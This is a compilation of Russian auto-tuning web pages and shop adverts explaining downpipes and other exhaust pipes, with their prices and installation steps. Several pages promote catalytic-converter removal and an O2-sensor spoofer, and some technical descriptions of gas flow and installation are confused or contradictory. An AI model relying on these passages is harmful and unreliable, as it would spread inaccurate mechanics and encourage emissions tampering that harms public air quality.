Пайпы
- Изготовление даунпайпов от 7500 рублей
- Ап-пайпы от 6500 рублей
- Н-У-Х-Т-пайпы от 1500 рублей
- Кат-пайпы от 7400 рублей
- Тест-пайпы от 6800 рублей
Есть возможность изготовить любой вид пайпа по индивидуальному проекту или мы поможем подобрать пайп для Вашего автомобиля из широкого ассортимента, представленного в наличие.
Услуги
Наш автоцентр «Лёха Выхлоп» специализируется на тюнинге и оптимизации работы выхлопных систем уже более 15 лет. Опытные специалисты проведут бесплатную компьютерную диагностику на современном оборудовании и дадут рекомендации по выхлопной системе Вашего транспорта. Вы можете записать на диагностику по телефону +7-903-129-20-00 или приехать к нам. Наш автосервис расположен по адресу: г. Москва, Сокольнический Вал 1, кор. 1.
Мы предоставляем широкий спектр услуг, касающихся пайпов:
- Изготовление пайпов различных конструкций, объёмов и длины
- Подбор и установка пайпа
- Замена и установка гофры
- Бесплатная комплексная компьютерная диагностика
- Консультация опытных мастеров
- Различные виды сварки
- Изготовление отдельных труб из различных сплавов стали, алюминия и карбона.
Виды пайпов
Runner – каждая отдельная труба в выпускном коллекторе, которая идет от цилиндра. Если раннеры одной длины, то «паук» является равнодлинным.
Up-pipe (от англ. – «верхняя труба» ап-пайп) труба, подводящая воздух от коллектора к турбине двигателя (соответственно, на атмосферные двигатели не устанавливается). Может устанавливаться на турбированные и атмосферные двигатели для увеличения мощности двигателя и увеличения пропускной способности.
Mid-pipe (мид-пайп,«серединная» труба в переводе с англ)- является трубой между даунпайпом и вторым катализатором. Так же, как и даун-пайп, может устанавливаться не только на турбированные двигатели, но и на атмосферные.
Down-pipe (в переводе с англ. «нисходящая», а не «нижняя», даун-пайп) — является приемной трубой после первого катализатора
X-pipe – элемент выхлопной системы, который выполнен в форме буквы Х (две приемные трубы соединяются и расходятся в месте где наиболее выражены импульсы и давление). Дает более равномерную продувку цилиндров двигателя.
H-pipe – является схожим элементом, что и х-пайп, но выполнен в форме буквы Н. Отличие от х-пайпа в том, что в Н-пайпе выхлопные газы стабилизируются путем обмена волнами сжатия и разрежения. А в Х-пайпе добавляется еще и обмен импульсами.
Y-pipe – тоже элемент из приемных труб, где две трубы соединены в одну. Чаще всего их устанавливают для раздвоения (выведения на две стороны) выхлопной системы.
T-pipe («тройник»)- компонент выхлопной системы, напоминающий букву Т. Его устанавливают для разводки выхлопной системы на обе стороны, как и У-пайп.
Cross-pipe –один из видов труб, является прекрасной альтернативой для Х-пайпа и Н-пайпа. Он делит потоки выхлопных газов пополам, а за счет уменьшения диаметра и плавного соединения труб достигается максимальный разгон потока отработанных газов. Обычно выглядит как 4 трубы, сваренные попарно и спирально закрученные.
Test-pipe – название для стронгера/пламегасителя/высокотемпературного резонатора или любого элемента, который устанавливается на место удаленного катализатора. Иногда называют каткиллер (catkiller)
Cat-pipe –является сочетанием двух труб- мид-пайпом и даун-пайпом и подводит выхлопные газы к первому катализатору.
Flex-pipe ( от англ. Flex- гибкий)- гибкое соединение труб после выпускного коллектора. Проще говоря, флекс-пайпом является гофра глушителя
Catback (сокр. от англ. Cat-catalyst- катализатор, back-задняя часть)- катбэком называют все компоненты выхлопной системы после второго (или единственного) катализатора. Туда входит-резонатор, глушитель, трубы, гофры.
Turboback ( «турбобэк»)- это группа элементов выхлопной системы, находящаяся после турбины двигателя, то есть: мид-пайп, даун-пайп, катализаторы, гофры, резонатор, пламегаситель/высокотемпературный резонатор/стронгер, глушитель.
Для чего нужен пайп
В зависимости от Ваших целей и потребностей, мастер установит на Ваш автомобиль соответствующий пайп. Как правило, автовладельцы, желая установить пайп, желают такого результата как:
- Увеличение мощности и крутящего момента двигателя
- Увеличение пропускной способности
- Изменение звука выхлопа
Итоги
Суммируя вышенаписанное, нужно отметить, что установка пайпа (пайпов) является важнейшим этапом в тюнинге выхлопной системы автомобиля. Качественные пайпы дадут прирост к мощности авто и улучшение разгонной динамики. Стоит сказать, что все на пайпы, которые у нас в наличие, имеется гарантийный сертификат. На свои услуги мы, разумеется, тоже даем гарантии от 1 года. Приезжайте к нам на консультацию по адресу: г. Москва, Сокольнический Вал 1, кор. 1!
Также, Вы можете прочитать Другие виды транспорта
Источник: https://xn—-7sbh7adsh6bd3d3c.xn--80adxhks/pajpy
Зачем в автомобиле нужен Downpipe и как его установить
Автовладельцы и простые любители автомобильной тематики наверняка прекрасно знают о существовании турбин и турбированных двигателей. Этот элемент необходим для обеспечения нагнетания воздуха, поступающего в двигатель, и позволяющего увеличить эффективность работы ДВС.
Турбомоторы отличаются своей повышенной мощностью и улучшенными характеристиками при сравнительно небольших объёмах двигателя. За счёт дополнительного элемента в виде турбины инженерам удаётся выжать максимум мощности и силовой установки, при этом не понижая моторесурс.
Но бывают ситуации, когда вместе с турбонагнетателем дополнительно используется компонент под названием Downpipe или просто Downpipe. Следует понять, что это такое, для чего используется и как устанавливается на автотранспортное средство.
Особенности конструкции
Изначально следует разобраться в том, что же такое Downpipe в автомобилях и какие функции выполняет этот элемент, дополняющий силовую установку.
В переводе с английского название устройства означает водосточную трубу. Она имеет соответствующий внешний вид и конструкцию, и с её помощью дополняется системы выхлопных газов.
Если говорить о том, что такое Downpipe и зачем он нужен в автомобиле, то конструкцию можно охарактеризовать как трубу, соединяющую турбонагнетатель, то есть турбину в машине и выхлопную систему автомобильного двигателя.
Подобное решение завоевало огромную популярность среди поклонников тюнинга и тех, кто хочет модернизировать свою машину, повысив эффективность и продуктивность силовой установки. Когда используется турбина, штатная система выхлопа не всегда может справиться с возложенными на неё нагрузками и обязанностями. Чтобы нивелировать этот недостаток, в конструкцию дополнительно устанавливается Downpipe усиленного типа. Помимо того, что Downpipe способствует повышенной эффективности работы нагнетателя воздуха, параллельно элемент может справиться с высокими температурными нагрузками. Это позволяет продлить срок службы системы выхлопа.
Если говорить о конструкции Downpipe, то её можно охарактеризовать как обычную трубу с достаточно большим диаметром. Это позволяет с более высокой скоростью выводить выхлопной газ и перенаправлять его потоки на турбонагнетатель. Главной отличительной особенностью Downpipe от стандартной организации выхлопной системы выступает факт отсутствия в нём катализатора, который предназначен для очистки различных вредных примесей в выхлопе.
На некоторых автотранспортных средствах применяются ещё и резонаторы, которые при использовании Downpipe обычно демонтируются. Главной задачей является создание условий для максимально качественного доступа выхлопного газа к турбине, чтобы последняя могла равномерно, эффективно и продуктивно функционировать.
Использование Downpipe предусматривает модернизацию всей выхлопной системы и глушителя. Часто применяются прямотоки, обеспечивающие более лёгкий выход для выхлопного газа и параллельно повышающие мощность двигателя.
Помимо непосредственно самой трубы из металла, устойчивого к повышенным температурам, конструкция Downpipe обязательно предусматривает наличие гофры. Гофрированный участок необходим, чтобы подавлять и гасить вибрации, различные колебания, которые могут передаваться на кузов и негативно влиять на поведение автомобиля.
Необходимость модернизации
Несмотря на то, что в конструктивных особенностях удалось разобраться, всё равно далеко не все понимают, для чего в автомобилях нужны Downpipe.
Downpipe нельзя считать обязательным элементом любого двигателя. Острой необходимости в его установке на мотор, который с завода оснащается турбонагнетателем, также нет, поскольку продуманная заводская система выхлопа уже адаптирована должным образом, и позволяет обеспечить высокий уровень эффективности.
Но есть иная ситуация, когда штатная турбина есть, но её производительности автовладельцу недостаточно. Он хочет повысить мощность. А для этого потребуется организовать несколько иное соединение между двигателем и выхлопной системой. Здесь на помощь приходит Downpipe.
Относительно того, что даёт Downpipe, нужно задумываться тогда, когда устанавливается на мотор турбина, которая изначально не была предусмотрена конструкцией двигателя. И тогда данные элементы, называемые Downpipe, помогают в соединении инородного или нового элемента со штатной выхлопной системой.
Downpipe более актуальны для иномарок с достаточно производительными атмосферными двигателями, а также с качественно выполненной выхлопной системой. Что же касается попыток установить эти трубы с гофрированным элементом на отечественные автомобили вместе с турбонагнетателем, то затея достаточно сомнительная.
Проблема отечественных автомобилей типа ВАЗ, на которые зачем-то пытаются установить турбину, заключается в устройстве штатного глушителя и всей выхлопной системы. Они не способны обеспечить перевод выхлопного газа на турбонагнетатель, а заводских комплектов не предусмотрено. Это заставляет проводить серьёзную модернизацию, а сам Downpipe изготавливать собственными руками. Иначе реализовать задумку никак не получится.
Можно сказать, что Downpipe является обязательным элементом при установке на автомобильный двигатель турбины, которая не предусмотрена заводов. Когда автомобилист решает повысить мощность и производительность своего атмосферного мотора путём добавления в его конструкцию турбонагнетателя, не стоит забывать о таком элементе как Downpipe.
Заводские аналоги
Достаточно много разговоров ходит о том, что приобрести Downpipe для своего автомобиля очень сложно, заводы их не выпускают и всё приходится собирать своими руками.
Это не совсем справедливое утверждение, поскольку заводские аналоги самодельных труб действительно существуют. Но важный нюанс в том, что в основном встречаются Downpipe, предназначенные именно для автомобилей американских производителей. Случается и так, что для одной модели доступно сразу несколько различных вариантов труб, позволяющих применять разные решения при модернизации своего автотранспортного средства.
Downpipe применяются среди поклонников тюнинга, задачей которых является повышение производительности и мощности силовой установки. И даже когда штатный турбонагнетатель есть, его порой оказывается недостаточно, по мнению автовладельца. Тогда снимается заводская турбина и устанавливается более мощная. Но этого мало, чтобы получить желаемый результат. Параллельно потребуется установить не только новую турбину, но также и другую отводную трубу, которой как раз и выступает Downpipe.
Отыскать заводской аналог Downpipe, позволяющий не собирать трубу своими руками, проще всего на американские автомобили. Реже встречаются заводские конструкции, предназначенные для японских и европейских машин. Официальных отводных труб (Downpipe) для отечественного автопрома, выпускаемых какими-то заводами, не существует.
Заводские решения можно считать достаточно редким явлением. Да, на некоторые машины отыскать подходящий Downpipe довольно просто. А на другие их попросту не существует. Поэтому тут приходится действовать своими руками, искать чертежи, материалы и собирать пайп самостоятельно.
Есть и другой вариант, который становится всё более актуальным. Это покупка изделия по индивидуальному заказу. Уже работает приличное количество компаний, готовых под конкретный двигатель и турбину сделать качественный Downpipe.
Нюансы производства
Чтобы Downpipe полностью оправдал ожидания, мог эффективно и качественно выполнять свои функции, требуется предельно внимательно подходить к вопросу производства.
Существуют заводские изделия, которые имеют гарантию, все необходимые сертификаты и пр. В их качестве можно быть уверенным. Чего не скажешь про разные кустарные и самодельные трубы, где далеко не всегда применяют те материалы, из которых делают настоящие высококачественные Dowmnpipe.
Начать следует с того, что в основу Downpipe ложится сталь и сплавы повышенного качества. Это главные компоненты при производстве. Задача материала не только иметь правильную форму и размеры, но и выдерживать высокотемпературные нагрузки. Потому при самостоятельном изготовлении категорически не рекомендуется использовать подручные материалы, не обладающие требуемыми параметрами и характеристиками.
Высококачественная сталь и сплав могут длительное время работать под большой нагрузкой и справляться с высокой температурой. Срок их службы достаточно продолжительный, потому потребности менять Downpipe каждый год или раз в несколько лет нет.
Поскольку отыскать заводской вариант Downpipe под множество автомобилей невозможно по причине его банального отсутствия на рынке, оптимальным вариантом считается обращение в компании, которые занимаются изготовлением Downpipe по индивидуальным замерам. Вы обращаетесь к специалистам, даёте им вводную информацию. На её основе мастера изготавливают оптимально соответствующий вашему двигателю и турбонагнетателю Downpipe.
Преимущество такого варианта в том, что можно заполучить фактически оригинальную трубу под свой автомобиль с соответствующими параметрами, характеристиками и выполненную из высококачественных материалов.
В теории такую трубу можно собрать своими руками, но эта процедура требует наличия определённого опыта, некоторых знаний и понимания того, какие материалы допускается использовать, а какие применять категорически нельзя.
Процесс установки
Процедуру монтажа Downpipe своими руками на автомобили нельзя назвать невероятно сложной и невыполнимой. Достаточно большое количество автолюбителей делают это самостоятельно, не прибегая к помощи специалистов.
Подобная модернизация системы отвода и подвода выхлопных газов с помощью турбины и Downpipe предусматривает часто и дополнительное улучшение коллектора. Вместо стандартного элемента предпочтительнее установить коллектор-паук. Это улучшенный вариант заводского оборудования, обеспечивающий более качественную и эффективную работу выхлопной системы автотранспортного средства.
Процесс установки выглядит следующим образом:
- Сначала нужно демонтировать штатный, установленный на автомобиль коллектор. После его снятия монтируется уже улучшенная система типа паук. С таким коллектором турбина и Downpipe действительно работают лучше, качественнее и эффективнее. Это не будет напрасной тратой денег и сил.
- Если вы меняете старую турбину на более производительную, выполняется процедура замены. Если же это атмосферный двигатель, на который было принято решение поставить турбонагнетатель, производится соединение всех элементов.
- Далее нужно всё тщательно настроить и запрограммировать. Для этого потребуется соединиться с электронным блоком управления. Не все умеют работать с ЭБУ, потому часто обращаются за помощью на этом этапе.
- Когда паук и турбонагнетатель установлены и подключены, потребуется закрепить через коллектор подготовленный заранее Downpipe.
- Следующий шаг заключается в том, чтобы от коллектора подключить вывод выхлопного газа на турбонагнетатель, тем самым обеспечить необходимое раскручивание лопастей турбины.
На этом установка считается завершённой. Остаётся только протестировать результат проделанной работы на практике, проверить работоспособность турбины и всей системы выхлопа. Если появляются какие-то рывки, слишком громкий звук или посторонние шумы, вибрации, требуется проверить ещё раз всю схему подключения, убедиться в качестве соединений всех компонентов и повторно выехать на тест-драйв.
При возникновении каких-то сложностей в процессе монтажа лучше сразу остановить работу, и отыскать хороших специалистов, способных помочь вам в завершении начатого.
Чтобы гарантировать себе успех и создать действительно эффективную систему выхлопа с турбиной, пауком и Downpipe, лучше сразу обратиться к проверенным мастерам по тюнингу, и положиться на их профессионализм и опыт в подобных делах.
Многие до сих пор сомневаются относительно того, нужна ли вообще их машине модернизация с использованием Downpipe, либо же это просто напрасная трата времени, денег и сил.
Тут стоит заметить, что сама по себе эта труба, называемая Downpipe, ничего существенного двигателю или системе выхлопа вашего автомобиля не даёт. Но существуют ситуации, когда без неё действительно обойтись никак не удаётся. И это касается атмосферных двигателей, на которые монтируется турбонагнетатель для повышения мощности и производительности. Оставлять штатную систему выхлопа с такой ситуации нельзя и невозможно, поскольку она не справится с такими функциями и возросшими нагрузками.
Также и смена турбонагнетателя на более производительную турбину далеко не всегда позволяет рассчитывать на сохранность всей штатной выхлопной системы. Приходится частично её менять, где одним из ключевых компонентов станет именно подходящий по размерам и форме Downpipe. Это командный игрок, который работает на благо остальных.
Источник: https://DriverTip.ru/osnovy/chto-takoe-downpipe-dlya-chego-nuzhen.html
Тюнинг глушителя — что это ? нужно знать! — Ремонт и тюнинг глушителей в СПБ
Наверное многие слышали всякие модные слова по поводу глушителя, но не до конца поняли из смысл и очень бы хотели знать, что же такое пайп, даунпайп, exhaust system, catback, и другие зашифрованные словечки. Мы расскажем, что такое тюнинг глушителя на языке тюнеров и переведем его на русский. Поехали ?
Что такое «ПАЙП» или «Pipe»
Pipe или «пайп» переводится на русский язык как «труба». Под словом «пайпинг» при этом понимается трубопровод или система из труб. Собственно «exhaust system» — ( выхлопная система) любого автомобиля состоит в первую очередь из труб и каждый отрезок этих труб имеет свое название. И если некоторые из них, вроде «даунпайпа» плотно вошли в обиход российских тюнеров, то всё остальные никто не использует.
А еще хуже, когда используют колхозные понятия, вроде » трасса или тракт «…
Выпускной коллектор — или «ПАУК»
Итак, сразу после головки блока цилиндров у нас находится первое изделие из труб — «exhaust manifold», он же «header», он же «collector», он же русский «выпускной коллектор» он же «паук». Как в русском так и в английском языке в случае турбомотора коллектор тоже имеет приставку «турбо».
«CatBack» или «КатБэк»
Сatback в переводе с английского почти похоже на что-то схожее с котом или кошкой, но увы это не так. КатБэк — это выхлопная система, идущая либо от катализатора, то есть позади его ( CAT — catalyst — катализатор ) и ( Back — задний — позади ). КатБэки пользуются популярностью на двигателях, которым нужно максимально свободно отводить выхлопные газы и чтобы этому процессу ничего не мешало.
«Раннер» или «runner»
Раннеры от слова «runner» — это трубы ( отводы ) , которые идут от каждого цилиндра к тому месту, где они объединяются вместе. Если раннеры одинаковой длины — коллектор называют «равнодлинным».
Важным частным случаем коллектора являются кат-коллекторы или «manifold converter» — 90% современных автомобилей имеют коллекторы, в которые сразу интегрирован каталитический нейтрализатор. У них короткие раннеры, часто примитивный дизайн из штампованной стали а замена катализатора возможна только в сборе. Такая деталь при этом совсем не дешева и часто весьма «затычна» с точки зрения продувки, не столько из-за катализатора, сколько из-за не оптимального сечения и длины раннеров.
«Даунпайп» или «downpipe»
Названия труб после коллектора будут отличаться, в зависимости от того атмосферный мотор или турбированный. В тубо-моторе сразу от турбины начинается всеми любимый «downpipe» ( даунпайп ) дословно «труба идущая вниз», прямого аналога в русском нет, но «приемная труба» вполне подходит.
Еще одна труба со своим предназначением и названием — «dump pipe» или «dump tube» — трубка отвода газов от Вестгейта (перепускного клапана турбины). Присутствует в тех случаях когда вестгейт внешний или имеет на фланце турбины свой собственный отдельный выход.
Если Вестгейт встроенный и не имеет своего отвода, то газы идут сразу в даунпайп и отдельной трубы не требуется.
«Фронт пайп» или «front pipes»
В случае атмосферного мотора сразу за коллекторами следуют «front pipes» ( фронт пайпы ) или по-русски приемные трубы. В приемных трубах обычно установлен один или несколько каталитических нейтрализаторов или универсальные пламегасители.
Заменой фронт пайпам часто становятся «cat delete pipes» — приемные трубы без катализаторов, в которых один или несколько катализаторов удалены а на их месте прямая труба.
— Прошу заметить, что никаких «искрогасителей» и «стронгеров» при этом ни в «даунпайпах» ни в «фронт пайпах» нет и не бывает. Вы не найдете их аналогов в английском языке и не найдете этих изделий в ассортименте зарубежных компаний. Однако, если нужно снизить резонанс или вибрацию выхлопа ( звука) то иногда устанавливаются спец-компоненты, такие как спортивные катализаторы с увеличенным сечением или пламегасители спортивного типа.
Устанавливаются эти компоненты в разрез пайпов.
После приемных труб (даунпайпа в турбо моторе или фронт пайпа в атмосферном моторе) начинается «middle section» — средняя часть выхлопа, она же » mid-pipe» Она обычно включает в себя первичный глушитель и части труб, идущие до заднего моста.
«H-pipe» или «X-pipe» — «Аш-пайп» или «Икс-пайп»
В атмосферных моторах с двойным симметричным или ассиметричным выхлопом, на стыке приемных труб и средней части, появляются новые герои — всеми любимые H-pipe или X-pipe или их сочетания Y-pipe.
В зависимости от конструкции и компоновки Х-pipe или H-pipe могут быть объединены с приемными трубами или быть отдельным элементом в средней части системы. Они могут быть как до так и после резонаторов, а то и вовсе интегрированы в сам резонатор или первичный глушитель. Эти компоненты отвечают в основном за смешивание выхлопных газов и их точный расчет дает уникальный бурлящий звук выхлопа типа АMG ( на моторах V-6 и более )
«Muffler» или «Мафлер» он же «глушак» — «глушитель» — » банка»
Заканчивает выхлоп всегда глушитель или «Muffler». Он может быть прямоточным, камерным, дипассивным ( управляемым с помощью заслонки ), круглым, овальным или плоским. Если он не нужен — то устанавливается «muffler delete pipe» — труба с насадкой без глушителя.
Теперь Вы подкованы и можете смело вступать в диспуты и дискуссии с мастерами из тюнинга глушителей ?
Всего комментариев: |
Источник: http://GluchakoFF.ru/news/tjuning_glushitelja/2018-03-14-111
Даунпайп (Downpipe) — плюсы и минусы, где установить в Москве
Автосервис «Замена катализатора» предлагает установку нового каталитического элемента или альтернативные варианты — установку даунпайпа, пламегасителя с обманкой, стронгера, резонатора и многое другое. Мы осуществляем ВСЕ виды работ, связанные с катализаторами, а также продаем необходимые для этого запчасти! Обращайтесь!
- Даунпайп без катализатора — от 1.200 рублей.
- Даунпайп со спортивным катализатором — от 13.000 рублей.
- Тюнинг выхлопной системы под увеличение мощности — от 30.000 (полная доработка или изготовление выхлопной системы на заказ, под нужные параметры и нужный звук.
- Катализатор — от 3.400 до 22.000 рублей.
- Подробнее о ценах в разделе ЦЕНЫ.
ОТЗЫВЫ
Что такое ДАУНПАЙП? Где он находится? Зачем он нужен? И другие популярные вопросы…
Что это такое даунпайп? На фотографиях ниже представлен даунпайп (блестящая труба на фото), а также ниже подробное описание что это такое. На первой фотографии черный — это выпускной коллектор, который отводит выхлопные газы от двигателя, справа от него турбина, а слева даунпайп. Даунпайп отводит выхлопные газы дальше в выхлопную систему.
Даунпайп стоит сразу после турбины и отводит выхлопные газы дальше в выхлопную систему.
Где находится Даунпайп в автомобиле?
Очень многие путают «ДАНУПАЙП» и «АППАЙП». Даунпайп отводит выхлопные газы в выхлопную систему и находится сразу после турбины, а АППАЙП подводит выхлопные газы к турбине от двигателя. Это всё видно на рисунках снизу.
Расположение данупайпа относительно турбины двигателя и выхлопной системы.
Для чего нужен даунпайп?
Онустанавливается для увеличения пропускной способности, и для более быстрого отвода выхлопных газов. После установки даунпайпа ничего не мешает турбине раскручиваться легко, быстро и на полную мощность. В штатной системе установлен катализатор и сделан он на основе трубы меньшего диаметра. Труба узкая и плохо пропускает выхлопные газы, а обычный катализатор мешает эффективному отводу выхлопных газов, он как «керамическая пробка» внутри штатной системы. На рисунках ниже сравнение даунпайпа и штатной системы с катализатором.
На рисунке видно, как выглядит катализатор изнутри.
Даунпайп без катализатора или со спортивным?
Есть даунпайпы без катализатора и со спортивным катализатором, оба инструмента практически одинаково эффективны. Со спортивным катализатором выхлопные газы значительно чище и не мешают жить владельцу авто, но он и несколько дороже. (катализатор — это фильтр, отвечающий за очистку выхлопных газов до норм Евро 4-5), спортивный катализатор имеет высокую производительность и высокую пропускную способность, и очень низкое сопротивление выхлопным газам, таким образом по эффективности он практически не отличается об даунпайпа без катализатора.
Взаимодействие даунпайпа и турбины, или как даунпайп прибавляет мощности?
Выхлопные газы очень быстры, сильно нагреты и расширены, и их давление очень высокое. Выхлопные газы раскручивают турбину, как ветер раскручивает ветреную мельницу. Тем самым турбина раскручивается до высокой скорости выхлопными газами с одной стороны, и начинает пропорционально всасывать больше воздуха с другой стороны. А дальше все просто, если вы сильнее дуете в костер (двигатель), то он лучше и эффективней горит (работает), и, следовательно, больше мощности и больше крутящего момента будет у двигателя. Даунпайп и позволяет увеличить пропускную способность системы и «дуть» на полную!
Исходя из замеров мощности до и после установки даунпайпа, можно сказать следующее, что даунпайп способен прибавить мощности от 3% до 10%, но размер прибавляемой мощности будет всецело зависеть от того какой у вас автомобиль и того какая выхлопная система установлена после даунпайпа. Так что если вы размышляете над вопросом «Есть ли толк от установки даунпайпа?» То мы можем вам ответить, что он есть, и не только виден на цифрах, но и серьезно ощущается.
Даунпайп без чипа
Имеет ли смысл данупайп без чипа? Да имеет! Но с чипом эффект будет сильнее, и он раскроет полностью установку даунпайпа. Без чипа (прошивки) даунпайп может прибавить вам до 3%-10% л. с., с чипом прибавка мощности на штатной турбине и форсунках может достигать 15%-20%.
Даунпайп как работает (даунпайп принцип работы)
Все просто: даунпайп позволяет выходить выхлопным газам с более низким сопротивлением, т. к. штатная система в себе содержит катализатор и строится на основе трубы низкого диаметра. Даунпайп по сути это просто большая труба, в которой ничего не мешает выходу выхлопных газов, примерно так это и работает.
Вместо чего устанавливается даунпайп?
Даунпайп ставится вместо штатной «узкой» трубы в которой есть штатный катализатор. Эта труба отводит выхлопные газы от турбины (двигателя) дальше в выхлопную систему.
Даунпайп или вырезать катализатор?
Даунпайп дает примерно на 30%-50% больше прибавки в мощности, чем простое удаление катализатора. Когда вы вырезаете катализатор то диаметр трубы остается такой же, как и был, а даунпайп ощутимо шире, и тем самым дает большую прибавку в мощности и крутящем моменте. Но тут есть один минус, даунпайп стоит дороже чем просто вырезать катализатор, поэтому каждый может выбрать сам, что для него лучше даунпайп или просто вырезать катализатор.
Даунпайп или спортивный катализатор?
Если брать стандартную систему и туда устанавливать спортивный катализатор, то это даст прирост в мощности, но незначительный, даунпайп без катализатора или со спортивным катализатором даст больший прирост по мощности. А вот разница в мощности даунпайпа со спортивным катализатором или без, очень маленькая, близка к погрешности в измерении на мощностном стенде.
Даунпайп: плюсы и минусы
Из плюсов можно выделить то что вы решаете сразу проблему с катализаторами, которая возникла бы рано или поздно. Кроме этого вы получаете ощутимую прибавку в мощности! Из минусов только то что за это нужно платить, но даунпайп стоит своих денег.
Эффект даунпайпа
Главный эффект от даунпайпа это прибавка лошадиных сил и крутящего момента! Что важно, так это то что этот эффект достигается без влезания в двигатель, и без вреда для него. Многие думаю, что эффект будет несильный, они ошибаются! При грамотной установке, эффект на самом деле достаточный, и достигает до 10%-12% мощности, это то количество, которое можно ощутить не только на цифрах, но и на деле, по ощущениям от езды.
Даунпайп на атмосферном двигателе (без турбины)
Многие говорят, что даунпайп как приемная труба может существовать только на турбированных двигателях, это не так. Он может существовать и на атмосферных двигателях! Люди просто путают АППАЙП и ДАУНПАЙП. Аппайп не существует в атмосферных двигателях, эта труба подводит выхлопные газы к турбине, а турбины нету, и значит подводить ничего не нужно. А вот даунпайп отводит выхлопные газы от двигателя, и на атмосферном двигателе (без турбины), даунпайп будет выполнять ровно эту же задачу.
«Турбояма и Турбо лаг», уменьшение эффекта с помощью даунпайпа
Отсюда и появляется проблема турбированных двигателей — «турболаг», «турбо-провал», «провал мощности турбированного мотора». Пока мотор не раскручен до определенных оборотов, выхлопных газов мало, и они слабо раскручивают турбину, слабо раскрученная трубина подает меньше воздуха двигателю, давая меньше мощности. Как только вы раскручиваете двигатель до более высоких оборотов, выхлопных газов становится больше, и трубина подает больше воздуха двигателю и у вас появляется больше мощности. Даунпайпом можно уменьшить эффект «турбо-ямы» или как его еще называют «турбо-провала», «Турбо-лага».
Источник: https://xn—-7sbabaaa8aqgkvphqz8a3af.xn--80adxhks/%D0%B4%D0%B0%D1%83%D0%BD%D0%BF%D0%B0%D0%B9%D0%BF/
Что такое даунпайп и для чего он нужен
Даунпайп (downpipe) переводится с английского языка как «водосточная труба». Используется в автомобильном тюнинге при установке турбины или замене старой на более мощный и производительный аналог. Часть системы выхлопных газов двигателя. Изготовляется из прочных и жароустойчивых материалов (чаще из нержавеющей стали) на заказ, в зависимости от мотора, модели турбины, конструкционных особенностей выхлопной системы и др.
Конструкция и назначение
Даунпайп состоит из следующих частей:
- Трубы. Даунпайп – это труба с круглым сечением, которая изготавливается из стали или различных сплавов. Главное требование к материалу – повышенные жаростойкие свойства. Труба должна выдерживать колоссальные температурные нагрузки в несколько сотен градусов во время эксплуатации. Для длительной работы детали требуется высокое качество сварных швов, которое получают при использовании метода аргонно-дуговой сварки.
Для изготовления даунпайпа применяется нержавеющая сталь. Изделие из этого материала отличается продолжительным сроком службы, высокой надёжностью, способствует беспрепятственному и быстрому прохождению продуктов сгорания. - Многослойной гофры. В конструкции детали для автотюнинга имеется гофра. Этот элемент необходим для снижения вибраций и колебаний, передающихся на кузов.
- Соединительных фланцев.Обеспечивают качественное и надёжное соединение. Отличаются высокой точностью обработки.
О назначении
- Соединение системы отработавших газов с турбиной;
- Нагнетание давления выхлопных газов на крыльчатку турбины;
- Увеличение мощности при проведении чип-тюнинга;
- Более эффективное противостояние горячим отработавшим газам;
- Изменение звука выхлопа, придание более «сочных» и басовитых ноток.
Установка даунпайпа
Монтаж даунпайпа проводится в следующей последовательности:
- Демонтируем заводской коллектор. Речь идёт о выпускном коллекторе. Он направляет отработавшие газы через катализатор в глушитель. Его меняют на более производительную деталь для улучшения работы выхлопной системы в целом и увеличения динамических характеристик транспортного средства. Установка даунпайпа без замены заводского коллектора не имеет смысла. Этот процесс сопровождается удалением катализатора из выхлопной системы.
- Устанавливаем тюнингованный коллектор (например, «паука»). «Паук» – популярная деталь при проведении любительских тюнинг-работ. Одинаково успешно используется на отечественных и зарубежных машинах. Имеет другую форму, размеры и конструкцию соединения приемных труб с выпускными окнами. Тюнингованные коллекторы бывают «короткими» и длинными». Их главное различие в конфигурации (4-1 или 4-2-1 соответственно). Коллекторы вида 4-1 дают дополнительную мощность в узком оборотном диапазоне и используются на высокофорсированных силовых установках. «Пауки» длинного типа применяются чаще. Предназначены для проведения любительских доработок машин. Дают большую мощность и высокий крутящий момент в широком оборотном диапазоне.
- Устанавливаем турбину, подключаем и настраиваем на силовом агрегате. Турбина – основной элемент турбированных двигателей. Увеличивает плотность воздуха путём нагнетания. Помогает сжигать больший объём горючего в единицу времени. Способствует увеличению мощности двигателя, возрастанию крутящего момента. Преобразует энергию выходящих газов в механическую энергию. Турбина различается габаритными размерами, техническими характеристиками. Изготовляется из сплавов, отличающихся повышенной жаростойкостью. Это сплавы никеля и хрома, кремниево-молибденовый чугун и др. Подбирается в зависимости от модели двигателя и целей доработки.
Даунпайп и турбина должны подходить друг к другу. Деталь для тюнинга выхлопной системы должна изготавливаться индивидуально, с учётом конструкции, мощностного потенциала и других особенностей турбины. - Подключаем вывод даунпайпа к турбине. После проведения монтажных работ переходим к настройке двигателя. Этот этап считается одним из основных. Только путём точной настройки можно добиться положительного эффекта от проведённого тюнинга.
Есть ли смысл устанавливать даунпайп?
Сам по себе даунпайп не даёт улучшения ( прироста мощности, спортивного выхлопного звука и т.д.) Но он является важным элементом при проведении комплексных мероприятий по модернизации силового агрегата и выхлопной системы.
В некоторых случаях даунпайп незаменим: при превращении «атмосферника» в «злой» турбированный двигатель или монтаже новой высокопроизводительной турбины. При таком тюнинге нельзя оставлять заводскую выхлопную систему, так как она не сможет эффективно решать поставленные задачи.
Возможные трудности при монтаже
Основные проблемы при установке даунпайпа связаны с откручиванием крепёжных элементов (гаек) с горячей части турбины. Автомобильная система выхлопа работает в тяжёлых условиях. Подвержена воздействию высоких температурных нагрузок, сталкивается с водой и агрессивными веществами (реагентами на дорогах). Неблагоприятные эксплуатационные условия ускоряют коррозионные процессы.
Поэтому перед монтажом даунпайпа будет не лишним запастись следующими крепежами:
- Самоконтрящимися гайками.
- Болтами, гайками для хомута выхлопной трубы.
- Шпильками соединительного фланца.
Самостоятельный тюнинг выхлопной системы и автомобиля в целом проводится при наличии знаний и определённых умений. В противном случае потратите большое количество времени и денежных средств впустую, но не добьётесь желаемого результата. Поэтому беритесь за самостоятельное изготовление и установку даунпайпа только тогда, когда уверены в своих силах. В остальных случаях лучше обращаться в специальные тюнинг-салоны и техцентры.
Загрузка…
Источник: https://avtocity365.ru/avtomobilistu-v-pomoshh/chto-takoe-daunpajp-o-naznachenii-konstruktsii-i-osobennostyah-ustanovki/
Даунпайп что это такое. Зачем устанавливают?
